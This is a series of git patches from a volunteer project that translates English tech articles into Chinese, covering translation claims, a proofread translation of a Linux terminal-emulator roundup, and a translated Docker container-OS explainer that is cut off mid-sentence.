From 9ff02f2feca744d47cfcaeca2a86eea1956b90d1 Mon Sep 17 00:00:00 2001 From: Unknown Date: Thu, 23 Nov 2017 23:35:23 +0800 Subject: [PATCH 0001/1627] 2017-11-23 23:35 MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit 2017-11-23 23:35 第一段 --- .../tech/20170530 How to Improve a Legacy Codebase.md | 11 +++++++++-- 1 file changed, 9 insertions(+), 2 deletions(-) diff --git a/sources/tech/20170530 How to Improve a Legacy Codebase.md b/sources/tech/20170530 How to Improve a Legacy Codebase.md index cff5e70538..7e2b257949 100644 --- a/sources/tech/20170530 How to Improve a Legacy Codebase.md +++ b/sources/tech/20170530 How to Improve a Legacy Codebase.md @@ -1,17 +1,24 @@ Translating by aiwhj # How to Improve a Legacy Codebase - +# 如何改善遗留的代码库 It happens at least once in the lifetime of every programmer, project manager or teamleader. You get handed a steaming pile of manure, if you’re lucky only a few million lines worth, the original programmers have long ago left for sunnier places and the documentation - if there is any to begin with - is hopelessly out of sync with what is presently keeping the company afloat. -Your job: get us out of this mess. +它在每一个程序员,项目管理员,团队领导的一生中都会发生至少一次。原来的程序员离开了这个地方,只留下了文档,和一坨几百万行屎一样的代码。一旦接管这些代码,想要跟上公司的进度简直让人绝望。 +Your job: get us out of this mess. +你的任务:让大家摆脱这个混乱的局面 + +当你的第一反应过去之后,你开始去熟悉这个项目,公司的管理层都在关注着,项目只能成功,然而,看了一遍之后却发现了许多的错误。该怎么做呢? After your first instinctive response (run for the hills) has passed you start on the project knowing full well that the eyes of the company senior leadership are on you. Failure is not an option. And yet, by the looks of what you’ve been given failure is very much in the cards. So what to do? +幸运(不幸)的是我已经遇到好几次这种情况了,我和我的小伙伴发现将这坨热气腾腾的屎变成一个健康可维护的项目是很值得的。下面这些是我使用的一些小技巧: I’ve been (un)fortunate enough to be in this situation several times and me and a small band of friends have found that it is a lucrative business to be able to take these steaming piles of misery and to turn them into healthy maintainable projects. Here are some of the tricks that we employ: ### Backup +### 备份 +在你去做任何事情之前备份与之相关的所有东西。这样可以确保不会丢失任何信息,这些信息可能会在一些地方很重要, Before you start to do anything at all make a backup of  _everything_  that might be relevant. This to make sure that no information is lost that might be of crucial importance somewhere down the line. All it takes is a silly question that you can’t answer to eat up a day or more once the change has been made. Especially configuration data is susceptible to this kind of problem, it is usually not versioned and you’re lucky if it is taken along in the periodic back-up scheme. So better safe than sorry, copy everything to a very safe place and never ever touch that unless it is in read-only mode. ### Important pre-requisite, make sure you have a build process and that it actually produces what runs in production From 8da81f76caa7af3f7d050f6e087b897c3857e444 Mon Sep 17 00:00:00 2001 From: cielong Date: Sat, 25 Nov 2017 21:10:59 -0500 Subject: [PATCH 0002/1627] cielong translating --- .../20170410 Writing a Time Series Database from Scratch.md | 3 +++ 1 file changed, 3 insertions(+) diff --git a/sources/tech/20170410 Writing a Time Series Database from Scratch.md b/sources/tech/20170410 Writing a Time Series Database from Scratch.md index a7f8289b63..e73ffa6777 100644 --- a/sources/tech/20170410 Writing a Time Series Database from Scratch.md +++ b/sources/tech/20170410 Writing a Time Series Database from Scratch.md @@ -1,3 +1,6 @@ +cielong translating +---- + Writing a Time Series Database from Scratch ============================================================ From 43001dc4646f676ee779102972c4ca7546b58c53 Mon Sep 17 00:00:00 2001 From: amesy Date: Sun, 26 Nov 2017 02:51:37 -0500 Subject: [PATCH 0003/1627] amesy translating --- sources/talk/20170320 Education of a Programmer.md | 2 ++ 1 file changed, 2 insertions(+) diff --git a/sources/talk/20170320 Education of a Programmer.md b/sources/talk/20170320 Education of a Programmer.md index 7ffeb2fe49..122a524dd6 100644 --- a/sources/talk/20170320 Education of a Programmer.md +++ b/sources/talk/20170320 Education of a Programmer.md @@ -1,3 +1,5 @@ +"amesy translating." + Education of a Programmer ============================================================ From 86adebde90cf2ab147595fc65681e0a29b0b910e Mon Sep 17 00:00:00 2001 From: Valoniakim <34000495+Valoniakim@users.noreply.github.com> Date: Sun, 26 Nov 2017 19:15:24 +0800 Subject: [PATCH 0004/1627] Translating by ValoniaKim Translating by ValoniaKim --- sources/tech/20171118 Language engineering for great justice.md | 1 + 1 file changed, 1 insertion(+) diff --git a/sources/tech/20171118 Language engineering for great justice.md b/sources/tech/20171118 Language engineering for great justice.md index d91c3ab471..35d9bd854f 100644 --- a/sources/tech/20171118 Language engineering for great justice.md +++ b/sources/tech/20171118 Language engineering for great justice.md @@ -1,3 +1,4 @@ +Translating by ValoniaKim Language engineering for great justice ============================================================ From 7bc8df2869798641f379456bf8f964818dbf43d7 Mon Sep 17 00:00:00 2001 From: hopefully2333 <787016457@qq.com> Date: Sun, 26 Nov 2017 19:51:05 +0800 Subject: [PATCH 0005/1627] Update 20090701 The One in Which I Call Out Hacker News.md --- .../tech/20090701 The One in Which I Call Out Hacker News.md | 2 ++ 1 file changed, 2 insertions(+) diff --git a/sources/tech/20090701 The One in Which I Call Out Hacker News.md b/sources/tech/20090701 The One in Which I Call Out Hacker News.md index 5a43be3bd6..44c751dd5a 100644 --- a/sources/tech/20090701 The One in Which I Call Out Hacker News.md +++ b/sources/tech/20090701 The One in Which I Call Out Hacker News.md @@ -1,3 +1,5 @@ +translating by hopefully2333 + # [The One in Which I Call Out Hacker News][14] From 017fb24387afbe6e5402109c138cf6d858616e98 Mon Sep 17 00:00:00 2001 From: Lonaparte_CHENG Date: Sun, 26 Nov 2017 14:49:54 +0100 Subject: [PATCH 0006/1627] =?UTF-8?q?=E3=80=90=E7=BF=BB=E8=AF=91=E4=B8=AD?= =?UTF-8?q?=E3=80=91Lessons=20from=20my...?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- ...70707 Lessons from my first year of live coding on Twitch.md | 2 ++ 1 file changed, 2 insertions(+) diff --git a/sources/tech/20170707 Lessons from my first year of live coding on Twitch.md b/sources/tech/20170707 Lessons from my first year of live coding on Twitch.md index eca587641f..94a58e875e 100644 --- a/sources/tech/20170707 Lessons from my first year of live coding on Twitch.md +++ b/sources/tech/20170707 Lessons from my first year of live coding on Twitch.md @@ -1,3 +1,5 @@ +Translating by lonaparte + Lessons from my first year of live coding on Twitch ============================================================ From 46c9f80a84b381b72688f6135d10aec78adb7296 Mon Sep 17 00:00:00 2001 From: S9mtAt <33994329+S9mtAt@users.noreply.github.com> Date: Sun, 26 Nov 2017 22:44:08 +0800 Subject: [PATCH 0007/1627] 20171006 Create a Clean-Code App with Kotlin Coroutines and Android Architecture Components.md Translating by S9mtAt --- ...ith Kotlin Coroutines and Android Architecture Components.md | 2 ++ 1 file changed, 2 insertions(+) diff --git a/sources/tech/20171006 Create a Clean-Code App with Kotlin Coroutines and Android Architecture Components.md b/sources/tech/20171006 Create a Clean-Code App with Kotlin Coroutines and Android Architecture Components.md index 0ff40cdd6e..e8c2861f27 100644 --- a/sources/tech/20171006 Create a Clean-Code App with Kotlin Coroutines and Android Architecture Components.md +++ b/sources/tech/20171006 Create a Clean-Code App with Kotlin Coroutines and Android Architecture Components.md @@ -1,6 +1,8 @@ Create a Clean-Code App with Kotlin Coroutines and Android Architecture Components ============================================================ +Translating by S9mtAt + ### Full demo weather app included. Android development is evolving fast. A lot of developers and companies are trying to address common problems and create some great tools or libraries that can totally change the way we structure our apps. From 33ab73f9505d8c6504a4b8066aa6449f8f394f27 Mon Sep 17 00:00:00 2001 From: wxy Date: Sun, 26 Nov 2017 23:10:28 +0800 Subject: [PATCH 0008/1627] PRF:20171116 5 Coolest Linux Terminal Emulators.md MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit @cnobelw 恭喜你,完成了第一篇贡献! --- ...1116 5 Coolest Linux Terminal Emulators.md | 59 +++++++++---------- 1 file changed, 29 insertions(+), 30 deletions(-) diff --git a/translated/tech/20171116 5 Coolest Linux Terminal Emulators.md b/translated/tech/20171116 5 Coolest Linux Terminal Emulators.md index 692ba31828..da334bba40 100644 --- a/translated/tech/20171116 5 Coolest Linux Terminal Emulators.md +++ b/translated/tech/20171116 5 Coolest Linux Terminal Emulators.md @@ -1,35 +1,38 @@ -# 5 款最酷的linux终端模拟器 +5 款最酷的 Linux 终端模拟器 ============================================================ ![Cool retro term](https://www.linux.com/sites/lcom/files/styles/rendered_file/public/banner2.png) -Carla Schroder 看着那些她喜欢的终端模拟器, 包括展示在这儿的 Cool Retro Term。[许可才能使用][4] -当然, 我们可以使用老旧的 GNOME 终端, Konsole, 和有趣的、虚弱的、老旧的 xterm。 然而, 当你带着尝试某种新东西的心境, 回过头来看看这 5 款酷炫并且实用的 Linux 终端。 +> Carla Schroder 正在看着那些她喜欢的终端模拟器, 包括展示在这儿的 Cool Retro Term。 + +虽然,我们可以继续使用老旧的 GNOME 终端、Konsole,以及好笑而孱弱的旧式 xterm。 不过,让我们带着尝试某种新东西的心境,回过头来看看 5 款酷炫并且实用的 Linux 终端。 ### Xiki -首先我要推荐的第一个终端是 [Xiki][10]。 Xiki 是 Craig Muth 的智慧结晶, 他是一个有才的程序员和有趣的人 (幽默, 可能还有其他意义)。 很久以前我写了 Xiki, 在 [遇见 Xiki, Linux 和 Mac OS X 下革命性的命令行Shell][11]。 Xiki 不仅仅是另一款终端模拟器; 它是一个扩展命令行范围、加快命令行速度的交互式环境。 +首先我要推荐的第一个终端是 [Xiki][10]。 Xiki 是 Craig Muth 的智慧结晶,他是一个天才程序员,也是一个有趣的人(有趣在此处的意思是幽默,可能还有其它的意思)。 很久以前我在 [遇见 Xiki,Linux 和 Mac OS X 下革命性命令行 Shell][11] 一文中介绍过 Xiki。 Xiki 不仅仅是又一款终端模拟器;它也是一个扩展命令行用途、加快命令行速度的交互式环境。 +视频: https://youtu.be/bUR_eUVcABg -Xiki 支持鼠标,并且能运行在绝大多数命令行Shell上。 它有大量的屏显帮助,而且使用鼠标和键盘能快速导航。 它在速度体现上的一个简单的例子就是增强了 `ls` 命令。 Xiki 在文件系统上可以实现多级缩放, 而不用持续的重复输入 `ls` 或者 `cd`, 或者使用巧妙的正则表达式。 +Xiki 支持鼠标,并且在绝大多数命令行 Shell 上都支持。 它有大量的屏显帮助,而且可以使用鼠标和键盘快速导航。 它体现在速度上的一个简单例子就是增强了 `ls` 命令。 Xiki 可以快速穿过文件系统上的多层目录,而不用持续的重复输入 `ls` 或者 `cd`, 或者利用那些巧妙的正则表达式。 -Xiki 集成了许多文本编辑器, 提供了一个永久的便签, 有一个快速搜索引擎, 同时像他们所说的, 也有许许多多。 Xiki 是如此的有特色、如此的不同, 最快的方式来学习和了解它可以看 [Craig 的有趣和实用的视频][12]。 +Xiki 可以与许多文本编辑器相集成, 提供了一个永久的便签, 有一个快速搜索引擎, 同时像他们所说的,还有许许多多的功能。 Xiki 是如此的有特色、如此的不同, 所以学习和了解它的最快的方式可以看 [Craig 的有趣和实用的视频][12]。 ### Cool Retro Term -我推荐 [Cool Retro Term][13] (上面主页上的显示) 主要因为它的外观,以及它的实用性。 它将我们带回了阴极射线管显示器的时代, 这不是很久以前, 而我并没有怀旧, 因我的冷屏死亡而撬液晶显示屏, 它基于 [Konsole][14], 因此有着 Konsole 的优秀功能。通过 Cool Retro Term 的配置文件菜单来改变它的外观。配置文件包括 Amber, Green, Pixelated, Apple ][, 和 Transparent Green, 以及一个现实的扫描线。它们中并不是所有的都是有用的, 例如 Vintage 配置文件就像一个现实的濒死的屏幕那样弯曲和闪烁。 +我推荐 [Cool Retro Term][13] (如题图显示) 主要因为它的外观,以及它的实用性。 它将我们带回了阴极射线管显示器的时代,这不算很久以前,而我也没有怀旧的意思,我死也不会放弃我的 LCD 屏幕。它基于 [Konsole][14], 因此有着 Konsole 的优秀功能。可以通过 Cool Retro Term 的配置文件菜单来改变它的外观。配置文件包括 Amber、Green、Pixelated、Apple 和 Transparent Green 等等,而且全都包括一个像真的一样的扫描线。并不是全都是有用的,例如 Vintage 配置文件看起来就像一个闪烁着的老旧的球面屏。 -Cool Retro Term 的 GitHub repository 有着详细的安装指南, 且 Ubuntu 用户有 [PPA][15]。 +Cool Retro Term 的 GitHub 仓库有着详细的安装指南,且 Ubuntu 用户有 [PPA][15]。 ### Sakura -当你想要一个优秀的轻量级、易配置的终端, 尝试 [Sakura][16] (图 1)。 它依赖少, 不像 GNOME 终端 和 Konsole, 它们在 GNOME 和 KDE 中占大块。大多数选项是可以通过右键菜单配置的, 例如选项卡的标签, 颜色, 大小, 选项卡的字体、 铃声, 以及光标类型的默认值。 你可以设置更多的选项, 例如绑定快捷键, 在你个人的配置文件里面, `~/.config/sakura/sakura.conf`。 +你要是想要一个优秀的轻量级、易配置的终端,可以尝试下 [Sakura][16](图 1)。 它依赖少,不像 GNOME 终端 和 Konsole,在 GNOME 和 KDE 中牵扯了很多组件。其大多数选项是可以通过右键菜单配置的,例如选项卡的标签、 颜色、大小、选项卡的默认数量、字体、铃声,以及光标类型。 你可以在你个人的配置文件 `~/.config/sakura/sakura.conf` 里面设置更多的选项,例如绑定快捷键。 ![sakura](https://www.linux.com/sites/lcom/files/styles/rendered_file/public/fig-1_9.png) -图 1: Sakura 是一个优秀的、轻量级的、可配置的终端。[许可才能使用][1] -命令行选项详见 `man sakura`。 使用这些来从命令行启动 sakura, 或者在你的图形启动器上使用它们。 例如, 打开 4 个选项卡并设置窗口标题为 MyWindowTitle : +*图 1: Sakura 是一个优秀的、轻量级的、可配置的终端。* + +命令行选项详见 `man sakura`。可以使用这些来从命令行启动 sakura,或者在你的图形启动器上使用它们。 例如,打开 4 个选项卡并设置窗口标题为 “MyWindowTitle”: ``` $ sakura -t MyWindowTitle -n 4 @@ -37,48 +40,44 @@ $ sakura -t MyWindowTitle -n 4 ### Terminology -[Terminology][17] 来自 Enlightenment 图形环境的郁葱可爱的世界,它能够被美化成任何你所想要的 (图 2)。 它有许多有用的功能: 独立的拆分窗口, 打开文件和 URLs, 文件图标, 选项卡, 并采取了更多其他功能。 它甚至能运行在没有图形界面的 Linux 控制台上。 - +[Terminology][17] 来自 Enlightenment 图形环境的郁葱可爱的世界,它能够被美化成任何你所想要的样子 (图 2)。 它有许多有用的功能:独立的拆分窗口、打开文件和 URL、文件图标、选项卡,林林总总。 它甚至能运行在没有图形界面的 Linux 控制台上。 ![Terminology](https://www.linux.com/sites/lcom/files/styles/rendered_file/public/fig-2_6.png) -图 2: Terminology 也能够运行在没有图形界面的 Linux 控制台上。[许可才能使用][2] -当你打开多个拆分窗口时,每个窗口都能设置不同的背景, 并且背景文件可以是任意媒体文件: 图像文件, 视频或者音乐文件。 它带有一堆黑色主题和透明度, 有的人需要可读的, 甚至一个 Nyan 猫主题。 没有滚动条, 因此需要使用组合键 Shift+PageUp 和 Shift+PageDown 进行上下导航。 +*图 2: Terminology 也能够运行在没有图形界面的 Linux 控制台上。* -他有多个控件: 一个右键单击菜单, 上下文对话框, 以及命令行选项。 右键单击菜单里包含最小字体, 且 Miniview 可显示一个微观的文件树。 如果有选项能使我找不到的东西可读, 当你打开多个标签时, 点击小标签浏览器来打开一个可以上下滚动的选择器。 任何东西都是可配置的; 通过 `man terminology` 查看一系列的命令和选项, 包括一批不错的快捷键快捷方式。 奇怪的是, 这不包括我偶然发现的以下命令: +当你打开多个拆分窗口时,每个窗口都能设置不同的背景,并且背景文件可以是任意媒体文件:图像文件、视频或者音乐文件。它带有一堆便于清晰可读的暗色主题和透明主题,它甚至一个 Nyan 猫主题。它没有滚动条,因此需要使用组合键 `Shift+PageUp` 和 `Shift+PageDown` 进行上下导航。 + +它有多个控件:一个右键单击菜单,上下文对话框,以及命令行选项。右键单击菜单里包含世界上最小的字体,且 Miniview 可显示一个微观的文件树,但我没有找到可以使它们易于辨读的选项。当你打开多个标签时,可以点击小标签浏览器来打开一个可以上下滚动的选择器。任何东西都是可配置的;通过 `man terminology` 可以查看一系列的命令和选项,包括一批不错的快捷键快捷方式。奇怪的是,帮助里面没有包括以下命令,这是我偶然发现的: * tyalpha - * tybg - * tycat - * tyls - * typop - * tyq -使用 `tybg [filename]` 命令来设置背景, 不带参数的 `tybg` 命令来移除背景。 运行 `typop [filename]` 来打开文件。 `tyls` 命令在图标视图中列出文件。 运行这些命令,加上 `-h` 选项来了解他们是干什么的。 即使有可读性的怪癖, Terminology 是快速、漂亮和实用的。 +使用 `tybg [filename]` 命令来设置背景,不带参数的 `tybg` 命令来移除背景。 运行 `typop [filename]` 来打开文件。 `tyls` 命令以图标视图列出文件。 加上 `-h` 选项运行这些命令可以了解它们是干什么的。 即使有可读性的怪癖,Terminology 依然是快速、漂亮和实用的。 ### Tilda -有几个优秀的下拉式终端模拟器, 包括 Guake 和 Yakuake。 [Tilda][18] (图 3) 是其中最简单和轻量级的一个。 打开 Tilda 后它保持打开, 你可以通过快捷键来显示和隐藏它。 Tilda 快捷键是o默认的, 你可以设置自己喜欢的快捷键。 它一直打开着的,随时准备工作, 但是直到你需要它的时候才会出现。 - +已经有几个优秀的下拉式终端模拟器,包括 Guake 和 Yakuake。 [Tilda][18] (图 3) 是其中最简单和轻量级的一个。 打开 Tilda 后它会保持打开状态, 你可以通过快捷键来显示和隐藏它。 Tilda 快捷键是默认设置的, 你可以设置自己喜欢的快捷键。 它一直打开着的,随时准备工作,但是直到你需要它的时候才会出现。 ![](https://www.linux.com/sites/lcom/files/styles/rendered_file/public/fig-3_3.png) -图 3: Tilda 是最简单和轻量级的一个终端模拟器。[许可才能使用][3] -Tilda 有一个漂亮的选项组件, 包括默认的大小、位置、外观、绑定键、搜索条、鼠标图标, 以及标签条。 这些都被右键单击菜单控制。 - _学习更多关于 Linux 的知识可以通过 Linux 基金会 和 edX 的免费课程 ["Linux 介绍" ][9]。_ +*图 3: Tilda 是最简单和轻量级的一个终端模拟器。* + +Tilda 选项方面有很好的补充,包括默认的大小、位置、外观、绑定键、搜索条、鼠标动作,以及标签条。 这些都被右键单击菜单控制。 + +_学习更多关于 Linux 的知识可以通过 Linux 基金会 和 edX 的免费课程 ["Linux 介绍" ][9]。_ -------------------------------------------------------------------------------- via: https://www.linux.com/learn/intro-to-linux/2017/11/5-coolest-linux-terminal-emulators -作者:[CARLA SCHRODER ][a] -译者:[译者ID](https://github.com/cnobelw) -校对:[校对者ID](https://github.com/校对者ID) +作者:[CARLA SCHRODER][a] +译者:[cnobelw](https://github.com/cnobelw) +校对:[wxy](https://github.com/wxy) 本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 From 26df558225e5aa0c20aef083e735123178848a28 Mon Sep 17 00:00:00 2001 From: wxy Date: Sun, 26 Nov 2017 23:11:16 +0800 Subject: [PATCH 0009/1627] PUB:20171116 5 Coolest Linux Terminal Emulators.md MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit @cnobelw 文章发表地址:https://linux.cn/article-9085-1.html 你的 LCTT 专页地址: https://linux.cn/lctt/cnobelw 再接再厉! --- .../20171116 5 Coolest Linux Terminal Emulators.md | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename {translated/tech => published}/20171116 5 Coolest Linux Terminal Emulators.md (100%) diff --git a/translated/tech/20171116 5 Coolest Linux Terminal Emulators.md b/published/20171116 5 Coolest Linux Terminal Emulators.md similarity index 100% rename from translated/tech/20171116 5 Coolest Linux Terminal Emulators.md rename to published/20171116 5 Coolest Linux Terminal Emulators.md From c7488f9c103ea90cd89f32b31d6a13d69545c65e Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?=E5=BC=A0=E5=AE=88=E6=B0=B8?= Date: Sun, 26 Nov 2017 23:18:42 +0800 Subject: [PATCH 0010/1627] yongshouzhang Translating --- .../20170622 A users guide to links in the Linux filesystem.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/sources/tech/20170622 A users guide to links in the Linux filesystem.md b/sources/tech/20170622 A users guide to links in the Linux filesystem.md index 5fc4defaeb..0a871028de 100644 --- a/sources/tech/20170622 A users guide to links in the Linux filesystem.md +++ b/sources/tech/20170622 A users guide to links in the Linux filesystem.md @@ -1,4 +1,4 @@ -Translating by Snapcrafter +Translating by yongshouzhang A user's guide to links in the Linux filesystem ============================================================ From 16e481e670f500808953e5775b055681c9e97895 Mon Sep 17 00:00:00 2001 From: zhangshoyong Date: Sun, 26 Nov 2017 23:30:37 +0800 Subject: [PATCH 0011/1627] Revert "yongshouzhang Translating" This reverts commit c7488f9c103ea90cd89f32b31d6a13d69545c65e. --- .../20170622 A users guide to links in the Linux filesystem.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/sources/tech/20170622 A users guide to links in the Linux filesystem.md b/sources/tech/20170622 A users guide to links in the Linux filesystem.md index 0a871028de..5fc4defaeb 100644 --- a/sources/tech/20170622 A users guide to links in the Linux filesystem.md +++ b/sources/tech/20170622 A users guide to links in the Linux filesystem.md @@ -1,4 +1,4 @@ -Translating by yongshouzhang +Translating by Snapcrafter A user's guide to links in the Linux filesystem ============================================================ From 1563bbe1de2eeca62e56312950525707690c3447 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?=E5=BC=A0=E5=AE=88=E6=B0=B8?= Date: Sun, 26 Nov 2017 23:40:20 +0800 Subject: [PATCH 0012/1627] =?UTF-8?q?=E7=BF=BB=E8=AF=91=E4=B8=AD...?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- .../20170622 A users guide to links in the Linux filesystem.md | 2 ++ 1 file changed, 2 insertions(+) diff --git a/sources/tech/20170622 A users guide to links in the Linux filesystem.md b/sources/tech/20170622 A users guide to links in the Linux filesystem.md index 0a871028de..3cb59aaacb 100644 --- a/sources/tech/20170622 A users guide to links in the Linux filesystem.md +++ b/sources/tech/20170622 A users guide to links in the Linux filesystem.md @@ -1,4 +1,6 @@ Translating by yongshouzhang + + A user's guide to links in the Linux filesystem ============================================================ From aa163e71376aa4f8304f2796c9fe5e60c1bcc09c Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?=E5=BC=A0=E5=AE=88=E6=B0=B8?= Date: Sun, 26 Nov 2017 23:55:29 +0800 Subject: [PATCH 0013/1627] =?UTF-8?q?=E4=B8=8A=E6=AC=A1=E6=8F=90=E4=BA=A4?= =?UTF-8?q?=E6=B2=A1=E4=BF=AE=E6=94=B9=E5=A5=BD?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- .../20170622 A users guide to links in the Linux filesystem.md | 1 - 1 file changed, 1 deletion(-) diff --git a/sources/tech/20170622 A users guide to links in the Linux filesystem.md b/sources/tech/20170622 A users guide to links in the Linux filesystem.md index e1b29fd1eb..3cb59aaacb 100644 --- a/sources/tech/20170622 A users guide to links in the Linux filesystem.md +++ b/sources/tech/20170622 A users guide to links in the Linux filesystem.md @@ -1,7 +1,6 @@ Translating by yongshouzhang ->>>>>>> 1563bbe1de2eeca62e56312950525707690c3447 A user's guide to links in the Linux filesystem ============================================================ From 58076c90b8e9bb0abe403767ea5ddfdb490f95eb Mon Sep 17 00:00:00 2001 From: geekpi Date: Mon, 27 Nov 2017 08:59:33 +0800 Subject: [PATCH 0014/1627] translated --- ...ner OS for Linux and Windows Containers.md | 84 ------------------- ...ner OS for Linux and Windows Containers.md | 82 ++++++++++++++++++ 2 files changed, 82 insertions(+), 84 deletions(-) delete mode 100644 sources/tech/20170531 Understanding Docker Container Host vs Container OS for Linux and Windows Containers.md create mode 100644 translated/tech/20170531 Understanding Docker Container Host vs Container OS for Linux and Windows Containers.md diff --git a/sources/tech/20170531 Understanding Docker Container Host vs Container OS for Linux and Windows Containers.md b/sources/tech/20170531 Understanding Docker Container Host vs Container OS for Linux and Windows Containers.md deleted file mode 100644 index 35ae7b418d..0000000000 --- a/sources/tech/20170531 Understanding Docker Container Host vs Container OS for Linux and Windows Containers.md +++ /dev/null @@ -1,84 +0,0 @@ -translating---geekpi - -# Understanding Docker "Container Host" vs. "Container OS" for Linux and Windows Containers - - - -Lets explore the relationship between the “Container Host” and the “Container OS” and how they differ between Linux and Windows containers. - -#### Some Definitions: - -* Container Host: Also called the Host OS. The Host OS is the operating system on which the Docker client and Docker daemon run. In the case of Linux and non-Hyper-V containers, the Host OS shares its kernel with running Docker containers. For Hyper-V each container has its own Hyper-V kernel. - -* Container OS: Also called the Base OS. The base OS refers to an image that contains an operating system such as Ubuntu, CentOS, or windowsservercore. Typically, you would build your own image on top of a Base OS image so that you can take utilize parts of the OS. Note that windows containers require a Base OS, while Linux containers do not. - -* Operating System Kernel: The Kernel manages lower level functions such as memory management, file system, network and process scheduling. - -#### Now for some pictures: - -![Linux Containers](http://floydhilton.com/images/2017/03/2017-03-31_14_50_13-Radom%20Learnings,%20Online%20Whiteboard%20for%20Visual%20Collaboration.png) - -In the above example - -* The Host OS is Ubuntu. - -* The Docker Client and the Docker Daemon (together called the Docker Engine) are running on the Host OS. - -* Each container shares the Host OS kernel. - -* CentOS and BusyBox are Linux Base OS images. - -* The “No OS” container demonstrates that you do not NEED a base OS to run a container in Linux. You can create a Docker file that has a base image of [scratch][1]and then runs a binary that uses the kernel directly. - -* Check out [this][2] article for a comparison of Base OS sizes. - -![Windows Containers - Non Hyper-V](http://floydhilton.com/images/2017/03/2017-03-31_15_04_03-Radom%20Learnings,%20Online%20Whiteboard%20for%20Visual%20Collaboration.png) - -In the above example - -* The Host OS is Windows 10 or Windows Server. - -* Each container shares the Host OS kernel. - -* All windows containers require a Base OS of either [nanoserver][3] or [windowsservercore][4]. - -![Windows Containers - Hyper-V](http://floydhilton.com/images/2017/03/2017-03-31_15_41_31-Radom%20Learnings,%20Online%20Whiteboard%20for%20Visual%20Collaboration.png) - -In the above example - -* The Host OS is Windows 10 or Windows Server. - -* Each container is hosted in its own light weight Hyper-V VM. - -* Each container uses the kernel inside the Hyper-V VM which provides an extra layer of separation between containers. - -* All windows containers require a Base OS of either [nanoserver][5] or [windowsservercore][6]. - -A couple of good links: - -* [About windows containers][7] - -* [Deep dive into the implementation Windows Containers including multiple User Modes and “copy-on-write” to save resources][8] - -* [How Linux containers save resources by using “copy-on-write”][9] - --------------------------------------------------------------------------------- - -via: http://floydhilton.com/docker/2017/03/31/Docker-ContainerHost-vs-ContainerOS-Linux-Windows.html - -作者:[Floyd Hilton ][a] -译者:[译者ID](https://github.com/译者ID) -校对:[校对者ID](https://github.com/校对者ID) - -本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 - -[a]:http://floydhilton.com/about/ -[1]:https://hub.docker.com/_/scratch/ -[2]:https://www.brianchristner.io/docker-image-base-os-size-comparison/ -[3]:https://hub.docker.com/r/microsoft/nanoserver/ -[4]:https://hub.docker.com/r/microsoft/windowsservercore/ -[5]:https://hub.docker.com/r/microsoft/nanoserver/ -[6]:https://hub.docker.com/r/microsoft/windowsservercore/ -[7]:https://docs.microsoft.com/en-us/virtualization/windowscontainers/about/ -[8]:http://blog.xebia.com/deep-dive-into-windows-server-containers-and-docker-part-2-underlying-implementation-of-windows-server-containers/ -[9]:https://docs.docker.com/engine/userguide/storagedriver/imagesandcontainers/#the-copy-on-write-strategy diff --git a/translated/tech/20170531 Understanding Docker Container Host vs Container OS for Linux and Windows Containers.md b/translated/tech/20170531 Understanding Docker Container Host vs Container OS for Linux and Windows Containers.md new file mode 100644 index 0000000000..2fcd02694d --- /dev/null +++ b/translated/tech/20170531 Understanding Docker Container Host vs Container OS for Linux and Windows Containers.md @@ -0,0 +1,82 @@ +# 了解用于 Linux 和 Windows 容器的 Docker “容器主机”与“容器操作系统” + + + +让我们来探讨一下“容器主机”和“容器操作系统”之间的关系,以及它们在 Linux 和 Windows 容器之间的区别。 + +#### 一些定义: + +* 容器主机:也称为主机操作系统。主机操作系统是 Docker 客户端和 Docker 守护程序在其上运行的操作系统。在 Linux 和非 Hyper-V 容器的情况下,主机操作系统与运行中的 Docker 容器共享 内核。对于 Hyper-V,每个容器都有自己的 Hyper-V 内核。 + +* 容器操作系统:也被称为基础操作系统。基础操作系统是指包含操作系统如 Ubuntu、CentOS 或 windowsservercore 的镜像。通常情况下,你将在基础操作系统镜像之上构建自己的镜像,以便可以利用部分操作系统。请注意,Windows 容器需要一个基础操作系统,而 Linux 容器不需要。 + +* 操作系统内核:内核管理诸如内存、文件系统、网络和进程调度等底层功能。 + +#### 这有些图片: + +![Linux Containers](http://floydhilton.com/images/2017/03/2017-03-31_14_50_13-Radom%20Learnings,%20Online%20Whiteboard%20for%20Visual%20Collaboration.png) + +在上面的例子中 + +* 主机操作系统是Ubuntu。 + +* Docker 客户端和 Docker 守护进程(一起被称为 Docker 引擎)正在主机操作系统上运行。 + +* 每个容器共享主机操作系统内核。 + +* CentOS 和 BusyBox 是 Linux 基础操作系统镜像。 + +“No OS” 容器表明你不需要基础操作系统以在 Linux 中运行一个容器。你可以创建一个含有 [scratch][1] 基础镜像的 Docker 文件,然后运行直接使用内核的二进制文件。 + +* 查看[这篇][2]文章来比较基础 OS 的大小。 + +![Windows Containers - Non Hyper-V](http://floydhilton.com/images/2017/03/2017-03-31_15_04_03-Radom%20Learnings,%20Online%20Whiteboard%20for%20Visual%20Collaboration.png) + +在上面的例子中 + +* 主机操作系统是 Windows 10 或 Windows Server。 + +* 每个容器共享主机操作系统内核。 + +* 所有 Windows 容器都需要 [nanoserver][3] 或 [windowsservercore][4] 的基础操作系统。 + +![Windows Containers - Hyper-V](http://floydhilton.com/images/2017/03/2017-03-31_15_41_31-Radom%20Learnings,%20Online%20Whiteboard%20for%20Visual%20Collaboration.png) + +在上面的例子中 + +* 主机操作系统是 Windows 10 或 Windows Server。 + +* 每个容器都托管在自己的轻量级 Hyper-V 虚拟机中。 + +* 